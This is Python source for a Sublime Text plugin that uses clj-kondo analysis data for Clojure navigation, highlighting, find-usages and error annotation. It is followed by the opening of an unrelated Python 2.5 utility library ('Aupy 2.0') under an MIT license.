name = namespace_definition.get("name")
nindex_usages = analysis_nindex_usages(analysis)
return [
namespace_usage
for namespace_usage in nindex_usages.get(name, [])
if file_extension(namespace_usage.get("filename"))
in thingy_file_extensions(namespace_definition)
]
def find_namespace_usages_with_usage(analysis, namespace_usage):
"""
Returns usages of namespace_usage.
"""
name = namespace_usage.get("to")
return [
usage
for usage in analysis_nindex_usages(analysis).get(name, [])
if file_extension(usage.get("filename"))
in thingy_file_extensions(namespace_usage)
]
def find_namespace_vars_usages(analysis, namespace_usage):
"""
Returns usages of Vars from namespace_usage.
It's useful when you want to see Vars (from namespace_usage) being used in your namespace.
"""
usages = []
for var_qualified_name, var_usages in analysis.get("vindex_usages", {}).items():
namespace, _ = var_qualified_name
if namespace == namespace_usage.get("to"):
usages.extend(var_usages)
return usages
def find_keyword_definition(analysis, keyword):
"""
Returns a keyword which has "definition semantics":
- Clojure Spec
- re-frame
"""
k = (keyword.get("ns"), keyword.get("name"))
for keyword_indexed in analysis_kindex(analysis).get(k, []):
if keyword_indexed.get("reg", None):
return keyword_indexed
# ---
def highlight_regions(view, selection, regions):
if regions:
view.add_regions(
"pg_pep_highligths",
regions,
scope="region.cyanish",
flags=sublime.DRAW_NO_FILL,
)
def find_thingy_regions(view, analysis, thingy):
thingy_type, _, thingy_data = thingy
regions = []
if thingy_type == TT_KEYWORD:
# It's a little more involved if it's a 'keys destructuring'.
# Keys names become locals, so their usages must be highligthed.
if thingy_data.get("keys-destructuring"):
lrn = analysis_lrn(analysis)
region = keyword_region(view, thingy_data)
# We should find a local binding for the keyword because of destructuring.
thingy_region, thingy_data = local_binding_in_region(view, lrn, region) or (
None,
None,
)
thingy = ("local_binding", thingy_region, thingy_data)
# Recursive call to find usages regions.
local_usages_regions = find_thingy_regions(view, analysis, thingy)
if local_usages_regions:
regions.extend(local_usages_regions)
else:
keywords = find_keywords(analysis, thingy_data)
for keyword in keywords:
regions.append(keyword_region(view, keyword))
elif thingy_type == TT_LOCAL_BINDING:
regions.append(local_binding_region(view, thingy_data))
local_usages = find_local_usages(analysis, thingy_data)
for local_usage in local_usages:
regions.append(local_usage_region(view, local_usage))
elif thingy_type == TT_LOCAL_USAGE:
# It's possible to have a local usage without a local binding.
# (It looks like a clj-kondo bug.)
if local_binding := find_local_binding(analysis, thingy_data):
regions.append(local_binding_region(view, local_binding))
local_usages = find_local_usages(analysis, thingy_data)
for local_usage in local_usages:
regions.append(local_usage_region(view, local_usage))
elif thingy_type == TT_VAR_DEFINITION:
regions.append(var_definition_region(view, thingy_data))
var_usages = find_var_usages(analysis, thingy_data)
for var_usage in var_usages:
regions.append(var_usage_region(view, var_usage))
elif thingy_type == TT_VAR_USAGE:
if var_definition := find_var_definition(analysis, thingy_data):
regions.append(var_definition_region(view, var_definition))
var_usages = find_var_usages(analysis, thingy_data)
for var_usage in var_usages:
regions.append(var_usage_region(view, var_usage))
elif thingy_type == TT_NAMESPACE_DEFINITION:
regions.append(namespace_definition_region(view, thingy_data))
elif thingy_type == TT_NAMESPACE_USAGE:
regions.append(namespace_usage_region(view, thingy_data))
var_usages = find_namespace_vars_usages(analysis, thingy_data)
for var_usage in var_usages:
if region := var_usage_namespace_region(view, var_usage):
regions.append(region)
elif thingy_type == TT_NAMESPACE_USAGE_ALIAS:
regions.append(namespace_usage_alias_region(view, thingy_data))
var_usages = find_namespace_vars_usages(analysis, thingy_data)
for var_usage in var_usages:
if region := var_usage_namespace_region(view, var_usage):
regions.append(region)
return regions
# ---
class PgPepClearCacheCommand(sublime_plugin.WindowCommand):
def run(self):
global _view_analysis_
_view_analysis_ = {}
global _paths_analysis_
_paths_analysis_ = {}
global _classpath_analysis_
_classpath_analysis_ = {}
class PgPepEraseAnalysisRegionsCommand(sublime_plugin.TextCommand):
def run(self, edit):
erase_analysis_regions(self.view)
class PgPepAnalyzeClasspathCommand(sublime_plugin.WindowCommand):
def run(self):
analyze_classpath_async(self.window)
class PgPepAnalyzePathsCommand(sublime_plugin.WindowCommand):
def run(self):
analyze_paths_async(self.window)
class PgPepAnalyzeViewCommand(sublime_plugin.TextCommand):
def run(self, edit):
analyze_view_async(self.view)
class PgPepGotoAnythingCommand(sublime_plugin.WindowCommand):
"""
Goto anything in scope.
Scope is one of: 'view', 'paths' or 'classpath'.
"""
def run(self, scope="view"):
project_path_ = project_path(self.window)
active_view = self.window.active_view()
# Goto is a window command, so it's possible
# that there isn't an active view.
# In that case, an empty analysis dict is used.
view_analysis_ = view_analysis(active_view.id()) if active_view else {}
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
analysis_ = {}
if scope == "view":
analysis_ = view_analysis_
elif scope == "paths":
analysis_ = paths_analysis_
elif scope == "classpath":
analysis_ = classpath_analysis_
items_ = [
*namespace_goto_items(analysis_),
*var_goto_items(analysis_),
*keyword_goto_items(analysis_),
]
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoNamespaceCommand(sublime_plugin.WindowCommand):
"""
Goto namespace in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = namespace_goto_items(analysis_)
# Sort by namespace name.
items_ = sorted(items_, key=lambda d: d["thingy_data"]["name"])
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoVarCommand(sublime_plugin.WindowCommand):
"""
Goto var in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = var_goto_items(analysis_)
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoKeywordCommand(sublime_plugin.WindowCommand):
"""
Goto keyword in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = keyword_goto_items(analysis_)
show_goto_thingy_quick_panel(self.window, items_)
class PgPepGotoSpecCommand(sublime_plugin.WindowCommand):
"""
Goto keyword defined by Clojure Spec in scope.
Scope is either 'classpath' or 'paths'.
"""
def run(self, scope="paths"):
project_path_ = project_path(self.window)
analysis_ = (
paths_analysis(project_path_)
if scope == "paths"
else classpath_analysis(project_path_)
)
items_ = keyword_goto_items(analysis_)
items_ = [
item_
for item_ in items_
if item_["thingy_data"]["reg"] == "clojure.spec.alpha/def"
]
show_goto_thingy_quick_panel(self.window, items_)
class PgPepCopyNameCommand(sublime_plugin.TextCommand):
"""
Copy a Thingy's name to the clipboard.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy:
thingy_type, _, thingy_data = thingy
thingy_namespace = thingy_data.get("ns") or thingy_data.get("to")
thingy_name = thingy_data.get("name")
thingy_qualified_name = (
f"{thingy_namespace}/{thingy_name}" if thingy_namespace else thingy_name
)
sublime.set_clipboard(thingy_qualified_name)
self.view.window().status_message("Copied")
class PgPepThingyNamespaceCommand(sublime_plugin.TextCommand):
"""
Show a Thingy's namespace in a popup.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy:
thingy_type, _, thingy_data = thingy
if thingy_namespace := thingy_data.get("ns") or thingy_data.get("to"):
content = f"""
<body id='pg-pep-thingy-namespace'>
{htmlify(thingy_namespace)}
</body>
"""
self.view.show_popup(
content,
location=-1,
max_width=500,
)
class PgPepShowDocCommand(sublime_plugin.TextCommand):
def run(self, edit, side_by_side=False):
is_debug = debug()
view_analysis_ = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, view_analysis_, region)
if thingy is None:
return
thingy_type, _, thingy_data = thingy
definition = None
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
if thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
# Try to find Var definition in view first,
# only if not found try paths and project analysis.
definition = (
find_var_definition(view_analysis_, thingy_data)
or find_var_definition(paths_analysis_, thingy_data)
or find_var_definition(classpath_analysis_, thingy_data)
)
elif (
thingy_type == TT_NAMESPACE_DEFINITION
or thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
definition = (
find_namespace_definition(view_analysis_, thingy_data)
or find_namespace_definition(paths_analysis_, thingy_data)
or find_namespace_definition(classpath_analysis_, thingy_data)
)
if definition:
# Name
# ---
name = definition.get("name", "")
name = inspect.cleandoc(html.escape(name))
ns = definition.get("ns", "")
ns = inspect.cleandoc(html.escape(ns))
filename = definition.get("filename")
qualified_name = f"{ns}/{name}" if ns else name
goto_command_url = sublime.command_url(
"pg_pep_goto",
{"location": thingy_location(definition)},
)
name_minihtml = f"""
<p class="name">
<a href="{goto_command_url}">{qualified_name}</a>
</p>
"""
# Arglists
# ---
arglists = definition.get("arglist-strs")
arglists_minihtml = ""
if arglists:
arglists_minihtml = """<p class="arglists">"""
for arglist in arglists:
arglists_minihtml += f"<code>{htmlify(arglist)}</code>"
arglists_minihtml += """</p>"""
# Doc
# ---
doc = definition.get("doc")
doc_minihtml = ""
if doc:
doc = re.sub(r"\s", " ", htmlify(doc))
doc_minihtml = f"""<p class="doc">{doc}</p>"""
content = f"""
<body id='pg-pep-show-doc'>
{name_minihtml}
{arglists_minihtml}
{doc_minihtml}
</body>
"""
if side_by_side:
sheet = self.view.window().new_html_sheet(
qualified_name,
content,
sublime.SEMI_TRANSIENT,
)
self.view.window().focus_sheet(sheet)
else:
self.view.show_popup(
content,
location=-1,
max_width=500,
)
class PgPepJumpCommand(sublime_plugin.TextCommand):
"""
Command to jump to thingies.
"""
def initialize_navigation(self, analysis, thingy_id, thingy_findings):
navigation = view_navigation(analysis)
if thingy_id != navigation.get("thingy_id"):
set_view_navigation(
analysis,
{
"thingy_id": thingy_id,
"thingy_findings": thingy_findings,
},
)
def find_position(self, thingy_data, thingy_findings):
for position, finding in enumerate(thingy_findings):
if finding == thingy_data:
return position
return -1
def jump(self, state, movement, findings_position):
navigation = view_navigation(state)
findings_position_after = findings_position
if movement == "forward":
if findings_position < len(navigation["thingy_findings"]) - 1:
findings_position_after = findings_position + 1
elif movement == "back":
if findings_position > 0:
findings_position_after = findings_position - 1
if findings_position != findings_position_after:
finding_at_position = navigation["thingy_findings"][findings_position_after]
region = local_binding_region(self.view, finding_at_position)
region = sublime.Region(region.begin(), region.begin())
self.view.sel().clear()
self.view.sel().add(region)
self.view.show(region)
def run(self, edit, movement):
state = view_analysis(self.view.id())
region = self.view.sel()[0]
if thingy := thingy_in_region(self.view, state, region):
thingy_type, thingy_region, thingy_data = thingy
# Navigation is a dictionary with keys:
# - thingy_id
# - thingy_findings
navigation = view_navigation(state)
thingy_findings = []
thingy_id = None
if thingy_type == TT_KEYWORD:
# It's a keyword in a keys destructuring context, so it creates a local binding.
# Instead of navigating to another keyword, we navigate to the next usage of the local.
if thingy_data.get("keys-destructuring", False):
lrn = analysis_lrn(state)
region = keyword_region(self.view, thingy_data)
# We should find a local binding for the keyword because of destructuring.
thingy_region, thingy_data = local_binding_in_region(
self.view, lrn, region
) or (None, None)
thingy = (TT_LOCAL_BINDING, thingy_region, thingy_data)
# Find local usages for this local binding (thingy).
local_usages = find_local_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
else:
thingy_findings = find_keywords(state, thingy_data)
thingy_id = (thingy_data.get("ns"), thingy_data.get("name"))
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_LOCAL_BINDING:
# Find local usages for this local binding (thingy).
local_usages = find_local_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_LOCAL_USAGE:
# Find local binding for this local usage (thingy).
local_binding = find_local_binding(state, thingy_data)
# It's possible to have a local usage without a local binding.
# (It looks like a clj-kondo bug.)
if local_binding is None:
return
local_usages = find_local_usages(state, local_binding)
thingy_findings = [local_binding]
thingy_findings.extend(local_usages)
thingy_id = thingy_data.get("id")
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_VAR_DEFINITION:
# Find Var usages for this Var definition (thingy).
var_usages = find_var_usages(state, thingy_data)
thingy_findings = [thingy_data]
thingy_findings.extend(var_usages)
thingy_id = (thingy_data.get("ns"), thingy_data.get("name"))
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
elif thingy_type == TT_VAR_USAGE:
# Find Var definition for this Var usage (thingy).
var_definition = find_var_definition(state, thingy_data)
var_usages = find_var_usages(state, thingy_data)
thingy_findings = [var_definition] if var_definition else []
thingy_findings.extend(var_usages)
thingy_id = (thingy_data.get("to"), thingy_data.get("name"))
if thingy_id:
self.initialize_navigation(state, thingy_id, thingy_findings)
position = self.find_position(thingy_data, thingy_findings)
if position != -1:
self.jump(state, movement, position)
{TT_NAMESPACE_USAGE, TT_NAMESPACE_USAGE_ALIAS}
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
# Jumping from a namespace usage, or alias, moves the caret
# to the first var usage of the namespace.
if thingy_findings := find_namespace_vars_usages(state, thingy_data):
# ID is the namespace name.
thingy_id = thingy_data.get("to")
self.initialize_navigation(state, thingy_id, thingy_findings)
# Jump to first var usage.
self.jump(state, movement, -1)
class PgPepShowThingy(sublime_plugin.TextCommand):
def run(self, edit):
region = self.view.sel()[0]
analysis = view_analysis(self.view.id())
thingy = thingy_in_region(self.view, analysis, region)
if thingy is None:
return
thingy_type, _, thingy_data = thingy
items_html = ""
for k, v in thingy_data.items():
items_html += f"<li>{htmlify(str(k))}: {htmlify(str(v))}</li>"
html = f"""
<body id='pg-pep-show-thingy'>
<style>
h1 {{
font-size: 1.1rem;
font-weight: 500;
font-family: system;
}}
</style>
<h1>{thingy_type}</h1>
<ul>
{items_html}
</ul>
</body>
"""
flags = (
sublime.SEMI_TRANSIENT | sublime.ADD_TO_SELECTION | sublime.CLEAR_TO_RIGHT
)
sheet = self.view.window().new_html_sheet(thingy_type, html, flags)
self.view.window().focus_sheet(sheet)
class PgPepGotoCommand(sublime_plugin.WindowCommand):
def run(self, location=None, side_by_side=False):
if location:
flags = GOTO_SIDE_BY_SIDE_FLAGS if side_by_side else GOTO_DEFAULT_FLAGS
goto(self.window, location, flags)
else:
print("(Pep) Can't goto without a location")
class PgPepGotoDefinitionCommand(sublime_plugin.TextCommand):
"""
Command to goto definition of a var, namespace, and keyword.
In case of a keyword, it works for re-frame handlers and Clojure Spec.
"""
def run(self, edit, side_by_side=False):
window = self.view.window()
view = self.view
analysis = view_analysis(view.id())
region = thingy_sel_region(view)
if thingy := thingy_in_region(view, analysis, region):
thingy_type, _, thingy_data = thingy
definition = None
if thingy_type == TT_LOCAL_USAGE:
definition = find_local_binding(analysis, thingy_data)
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
definition = (
find_namespace_definition(analysis, thingy_data)
or find_namespace_definition(paths_analysis_, thingy_data)
or find_namespace_definition(classpath_analysis_, thingy_data)
)
elif thingy_type == TT_VAR_USAGE:
namespace_ = thingy_data.get("to", None)
name_ = thingy_data.get("name", None)
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
classpath_analysis_ = classpath_analysis(project_path_)
definition = (
find_var_definition(analysis, thingy_data)
or find_var_definition(paths_analysis_, thingy_data)
or find_var_definition(classpath_analysis_, thingy_data)
)
elif thingy_type == TT_KEYWORD:
keyword_namespace = thingy_data.get("ns", None)
keyword_name = thingy_data.get("name", None)
project_path_ = project_path(window)
paths_analysis_ = paths_analysis(project_path_)
definition = find_keyword_definition(
analysis, thingy_data
) or find_keyword_definition(paths_analysis_, thingy_data)
if definition:
flags = GOTO_SIDE_BY_SIDE_FLAGS if side_by_side else GOTO_DEFAULT_FLAGS
goto(window, thingy_location(definition), flags)
else:
print("(Pep) Unable to find definition")
class PgPepTraceUsages(sublime_plugin.TextCommand):
"""
Command to trace usages of a var or namespace.
"""
def run(self, edit):
view_analysis_ = view_analysis(self.view.id())
region = thingy_sel_region(self.view)
if thingy := thingy_in_region(self.view, view_analysis_, region):
thingy_type, thingy_region, thingy_data = thingy
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
thingy_usages = None
# Find usages, in paths analysis, from var definition or usage:
if thingy_type == TT_VAR_DEFINITION or thingy_type == TT_VAR_USAGE:
thingy_usages = find_var_usages(paths_analysis_, thingy_data)
def trace_var_usages(thingy_usage):
from_ = thingy_usage.get("from")
from_var_ = thingy_usage.get("from-var")
from_usages = var_usages(paths_analysis_, (from_, from_var_))
return {
"thingy_data": thingy_usage,
"thingy_traces": [
trace_var_usages(from_usage)
for from_usage in from_usages
if not recursive_usage(from_usage)
],
}
def tree_branches(trace, level=1):
thingy_data = trace.get("thingy_data", {})
from_namespace = thingy_data.get("from")
from_var = thingy_data.get("from-var")
from_var = "/" + from_var if from_var else ""
filename = thingy_data.get("filename", "")
row = thingy_data.get("row", "")
col = thingy_data.get("col", "")
s = ""
# It doesn't seem useful to show a refered var usage, so it's ignored.
# There might be other cases that should be ignored too.
is_ignored = thingy_data.get("refer", False)
if not is_ignored:
s = "\n " + ("\t" * level) + "-"
s = (
s
+ f" {from_namespace}{from_var} (File: {filename}:{row}:{col})"
)
for trace in trace["thingy_traces"]:
s = s + tree_branches(trace, level=level + 1)
return s
def tree(trace):
thingy_data = trace.get("thingy_data", {})
name = thingy_data.get("name")
namespace = thingy_data.get("ns") or thingy_data.get("from")
thingy_traces = trace["thingy_traces"]
s = f"- {namespace}/{name} (Usages: {len(thingy_traces)})"
for trace in thingy_traces:
s = s + tree_branches(trace)
return s
if thingy_usages:
trace = {
"thingy_data": thingy_data,
"thingy_traces": [
trace_var_usages(thingy_usage)
for thingy_usage in thingy_usages
if not recursive_usage(thingy_usage)
],
}
window = self.view.window()
output_view_ = output_panel(window)
output_view_.set_read_only(False)
output_view_.settings().set("line_numbers", False)
output_view_.settings().set("gutter", False)
output_view_.settings().set("is_widget", True)
output_view_.settings().set("word_wrap", False)
output_view_.settings().set("line_padding_top", 0)
output_view_.settings().set("line_padding_bottom", 0)
output_view_.settings().set(
"result_file_regex", r"\(File: ([^\"]+):(\d+):(\d+)\)"
)
output_view_.run_command("select_all")
output_view_.run_command("right_delete")
output_view_.run_command(
"append",
{
"characters": tree(trace),
},
)
output_view_.set_read_only(True)
show_output_panel(window)
class PgPepFindUsagesCommand(sublime_plugin.TextCommand):
def run(self, edit, scope="view"):
view_analysis_ = view_analysis(self.view.id())
viewport_position = self.view.viewport_position()
region = self.view.sel()[0]
if thingy := thingy_in_region(self.view, view_analysis_, region):
thingy_type, thingy_region, thingy_data = thingy
project_path_ = project_path(self.view.window())
paths_analysis_ = paths_analysis(project_path_)
thingy_usages = None
# The analysis used is based on the scope parameter:
analysis_ = view_analysis_ if scope == "view" else paths_analysis_
if thingy_type == TT_KEYWORD:
# To be considered:
# If the keyword is a destructuring key,
# should it show its local usages?
thingy_usages = find_keyword_usages(analysis_, thingy_data)
elif thingy_type == TT_VAR_DEFINITION:
thingy_usages = find_var_usages(analysis_, thingy_data)
elif thingy_type == TT_VAR_USAGE:
thingy_usages = find_var_usages(analysis_, thingy_data)
elif thingy_type == TT_NAMESPACE_DEFINITION:
thingy_usages = find_namespace_usages(analysis_, thingy_data)
elif (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
# Usages of a namespace, in the scope of a single view, shows usages of vars instead of namespace.
# I think it's safe to assume that this behavior is expected for view usages.
if scope == "view":
thingy_usages = find_namespace_vars_usages(
analysis_,
thingy_data,
)
else:
thingy_usages = find_namespace_usages_with_usage(
analysis_,
thingy_data,
)
if thingy_usages:
if len(thingy_usages) == 1:
location = thingy_location(thingy_usages[0])
goto(self.view.window(), location)
else:
quick_panel_items = []
for thingy_usage in thingy_usages:
trigger = thingy_usage.get("from") or os.path.basename(
thingy_usage.get("filename")
)
details = thingy_usage.get("filename", "")
annotation = f'Line {thingy_usage.get("row", "Row")}, Column {thingy_usage.get("col", "Col")}'
quick_panel_items.append(
sublime.QuickPanelItem(
trigger,
details,
annotation,
thingy_kind(thingy_type, thingy_data),
)
)
def on_done(index, _):
if index == -1:
# Restore selection and viewport position:
self.view.sel().clear()
self.view.sel().add(region)
self.view.window().focus_view(self.view)
self.view.set_viewport_position(viewport_position, True)
else:
location = thingy_location(thingy_usages[index])
goto(self.view.window(), location)
def on_highlighted(index):
location = thingy_location(thingy_usages[index])
goto(
self.view.window(),
location,
flags=sublime.ENCODED_POSITION | sublime.TRANSIENT,
)
placeholder = None
if (
thingy_type == TT_NAMESPACE_USAGE
or thingy_type == TT_NAMESPACE_USAGE_ALIAS
):
placeholder = f"{thingy_data.get('to')} is used {len(thingy_usages)} times"
else:
placeholder = f"{thingy_data.get('name')} is used {len(thingy_usages)} times"
self.view.window().show_quick_panel(
quick_panel_items,
on_done,
sublime.WANT_EVENT,
0,
on_highlighted,
placeholder,
)
class PgPepSelectCommand(sublime_plugin.TextCommand):
def run(self, edit):
is_debug = debug()
view_analysis_ = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, view_analysis_, region)
if is_debug:
print("(Pep) Thingy", thingy)
if thingy:
regions = find_thingy_regions(self.view, view_analysis_, thingy)
self.view.sel().clear()
self.view.sel().add_all(regions)
class PgPepHighlightCommand(sublime_plugin.TextCommand):
def run(self, edit):
analysis = view_analysis(self.view.id())
region = self.view.sel()[0]
thingy = thingy_in_region(self.view, analysis, region)
self.view.erase_regions("pg_pep_highligths")
# We can't highlight if view was modified,
# because regions might be different.
if thingy and not staled_analysis(self.view):
regions = find_thingy_regions(self.view, analysis, thingy)
if regions:
highlight_regions(self.view, self.view.sel(), regions)
class PgPepAnnotateCommand(sublime_plugin.TextCommand):
def run(self, edit):
try:
def finding_region(finding):
line_start = finding["row"] - 1
line_end = (finding.get("end-row") or finding.get("row")) - 1
col_start = finding["col"] - 1
col_end = (finding.get("end-col") or finding.get("col")) - 1
pa = self.view.text_point(line_start, col_start)
pb = self.view.text_point(line_end, col_end)
return sublime.Region(pa, pb)
def finding_minihtml(finding):
return f"""
<body>
<div">
<span>{htmlify(finding["message"])}</span></div>
</div>
</body>
"""
analysis = view_analysis(self.view.id())
findings = analysis_findings(analysis)
warning_region_set = []
warning_minihtml_set = []
error_region_set = []
error_minihtml_set = []
for finding in findings:
if finding["level"] == "error":
error_region_set.append(finding_region(finding))
error_minihtml_set.append(finding_minihtml(finding))
elif finding["level"] == "warning":
warning_region_set.append(finding_region(finding))
warning_minihtml_set.append(finding_minihtml(finding))
# Erase regions from previous analysis.
erase_analysis_regions(self.view)
redish = self.view.style_for_scope("region.redish")["foreground"]
orangish = self.view.style_for_scope("region.orangish")["foreground"]
self.view.add_regions(
"pg_pep_analysis_error",
error_region_set,
scope="region.redish",
annotations=error_minihtml_set,
annotation_color=redish,
flags=(
sublime.DRAW_SQUIGGLY_UNDERLINE
| sublime.DRAW_NO_FILL
| sublime.DRAW_NO_OUTLINE
),
)
self.view.add_regions(
"pg_pep_analysis_warning",
warning_region_set,
scope="region.orangish",
annotations=warning_minihtml_set,
annotation_color=orangish,
flags=(
sublime.DRAW_SQUIGGLY_UNDERLINE
| sublime.DRAW_NO_FILL
| sublime.DRAW_NO_OUTLINE
),
)
status_messages = []
if settings().get("view_status_show_errors", True):
if summary_errors := analysis_summary(analysis).get("error"):
status_messages.append(f"Errors: {summary_errors}")
if settings().get("view_status_show_warnings", False):
if summary_warnings := analysis_summary(analysis).get("warning"):
status_messages.append(f"Warnings: {summary_warnings}")
# Show the number of errors and/or warnings:
# (Clear the status if there isn't any error or warning.)
self.view.set_status(
"pg_pep_view_summary",
", ".join(status_messages) if status_messages else "",
)
except Exception as e:
print(f"(Pep) Annotate failed.", traceback.format_exc())
class PgPepViewListener(sublime_plugin.ViewEventListener):
"""
These 'actions' are configured via settings.
You might want to disable running analyzes on load & save for instance.
See Pep.sublime-settings.
"""
@classmethod
def is_applicable(_, settings):
return settings.get("syntax") in {
"Packages/Tutkain/Clojure (Tutkain).sublime-syntax",
"Packages/Tutkain/ClojureScript (Tutkain).sublime-syntax",
"Packages/Tutkain/Clojure Common (Tutkain).sublime-syntax",
"Packages/Clojure/Clojure.sublime-syntax",
"Packages/Clojure/ClojureScript.sublime-syntax",
}
def __init__(self, view):
self.view = view
self.modified_time = None
def view_analysis_completed(self, analysis):
if annotate_view_analysis():
self.view.run_command("pg_pep_annotate")
def on_activated_async(self):
analyze_view_async(self.view, on_completed=self.view_analysis_completed)
def on_modified_async(self):
"""
The time of modification is recorded so it's possible
to check how long ago the last change happened.
It's very import for the view analysis. See `on_selection_modified_async`.
"""
self.modified_time = time.time()
def on_post_save_async(self):
if settings().get("analyze_paths_on_post_save", False):
analyze_paths_async(self.view.window())
def on_selection_modified_async(self):
"""
When the selection is modified, two actions might be triggered:
- A region is highlighted;
- Active view is analyzed.
The view is analyzed (async) when its analysis data is staled
and it passes a threshold (in seconds) of the last time the view was modified.
"""
if automatically_highlight():
sublime.set_timeout(lambda: self.view.run_command("pg_pep_highlight"), 0)
if self.modified_time:
# Don't analyze when the programmer is editing the view.
# (When last modification timestamp is less then threshold.)
if staled_analysis(self.view) and (time.time() - self.modified_time) > 0.2:
analyze_view_async(self.view, on_completed=self.view_analysis_completed)
def on_close(self):
"""
It's important to delete a view's state on close.
"""
set_view_analysis(self.view.id(), {})
class PgPepEventListener(sublime_plugin.EventListener):
"""
Paths and classpath are analyzed when a project is loaded.
Analysis are cleared when a project is closed.
"""
def on_load_project_async(self, window):
if settings().get("analyze_paths_on_load_project", False):
analyze_paths_async(window)
if settings().get("analyze_classpath_on_load_project", False):
analyze_classpath_async(window)
def on_pre_close_project(self, window):
"""
Called right before a project is closed.
"""
project_path_ = project_path(window)
print(f"(Pep) Clear project cache (Project: {project_path_})")
if project_path_:
set_paths_analysis(project_path_, {})
set_classpath_analysis(project_path_, {})
# ---
def plugin_loaded():
print("(Pep) Plugin loaded")
if window := sublime.active_window():
if settings().get("analyze_paths_on_plugin_loaded", False):
analyze_paths_async(window)
if settings().get("analyze_classpath_on_plugin_loaded", False):
analyze_classpath_async(window)
|
aupy2.py
|
#!/usr/bin/env python
"""Aupy 2.0
Author: Paul deGrandis
Created: June 02 2008
Requires Python 2.5
Copyright (c) 2008 Paul deGrandis // aupy.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import with_statement
import sys
if sys.version < '2.5':
print "Aupy 2.0 requires Python 2.5 or higher"
sys.exit(1)
from threading import Thread
from contextlib import contextmanager
from functools import wraps
class RegisterUtilityMethods(type):
"""A metaclass to auto register utility methods"""
def __new__(mcls, classname, bases, classdict):
"""Auto register all utility methods
Do this in a similar manner as the earlier version of Aupy did"""
utilMeths = classdict.setdefault("_utilityMethods", [])
for item in classdict.values():
if callable(item) and hasattr(item, "_utilitySpecs"):
utilMeths.append(item)
return super(RegisterUtilityMethods, mcls).__new__(mcls, classname, bases, classdict)
class Utility(object):
"""A class containing all necessary functionality for
utility creation and interaction."""
class UtilityError(Exception):
"""A class for general utility method errors"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class UtilityMethodsMixIn(object):
"""This mixin provides the extra functionality for classes
that contain Utility Methods.
Currently this is only auto Utility Method Registration."""
__metaclass__ = RegisterUtilityMethods
def __init__(self):
super(UtilityMethodsMixIn, self).__init__()
@staticmethod
def isValidUtilityMethod(func):
"""Allows reflection to work on utility methods;
Answers: 'Could this be a utility method?'"""
return hasattr(func, "_utilitySpecs")
@staticmethod
def isUtilityMethod(func, self_or_dict=[]):
"""Checks the current registered functions to see if
a given function is a known utility method.
Please also see isValidUtilityMethod.
Arguments:
func - the function in question
[self_or_dict] - an object's identity reference or dictionary (for scoping)
Returns:
result - a boolean"""
